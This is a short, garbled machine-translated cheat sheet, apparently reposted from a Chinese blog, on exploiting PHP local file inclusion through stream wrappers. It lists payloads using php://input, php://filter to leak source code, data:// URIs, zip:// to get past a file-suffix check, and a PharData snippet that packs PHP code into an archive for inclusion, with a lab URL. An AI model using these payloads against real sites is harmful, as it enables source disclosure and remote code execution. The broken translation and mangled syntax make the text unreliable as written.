-
(POST accepted values over) use php stream the INPUT:
? File = php: // the INPUT
(required allow_url_include = On, detailed → [ http://php.net/manual/en/wrappers.php.php](http: //php.net/manual/en/wrappers.php.php) )
code execution: Php using flow filter (the filter can be used to read the contents of the file php , no need to open allow_url_include):
? = File php: //filter/convert.base64-encode/resource=index.php-
URIs use the Data:
? File = [the Data: // text / Plain; Base64, Base64-encoded payload] (data: // text / plain; base64, base64 encoded payload)
(required allow_url_include = On)<?php phpinfo();
, Do not pay attention to?> Closed
Other protocols using encapsulated
-
zip protocol
http://php.net/manual/zh/wrappers.compression.phpphp $include_file=$_GET[include_file]; if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ) { require( $include_file ); }
taken over the rear frame 4 characters is not judged php, if it is carried out comprising phpAgreement prototype: ZIP: //archive.zip#dir/file.txt
Note url encoded as # # This conflict will and url Agreement -
phar agreement
phar archive is the php file to a file inside the package (I understand it is as similar to the zip archive)php <?php $p = new PharData(dirname(__FILE__).'/phartest.aaa', 0,'phartest',Phar::ZIP) ; $p->addFromString('testfile.txt', '<?php phpinfo();?>'); ?>
created phar time to pay attention parameter in php.ini, phar.readonly set off (the default two local tests are It is off)
and then access protocol by including:
http://192.168.227.128/other/lfi/ex1.php?f=phar://./phar/phartest.aaa/testfile.txtThis method uses for php> 5.3.0
Reproduced in: https: //www.jianshu.com/p/826543e07b4c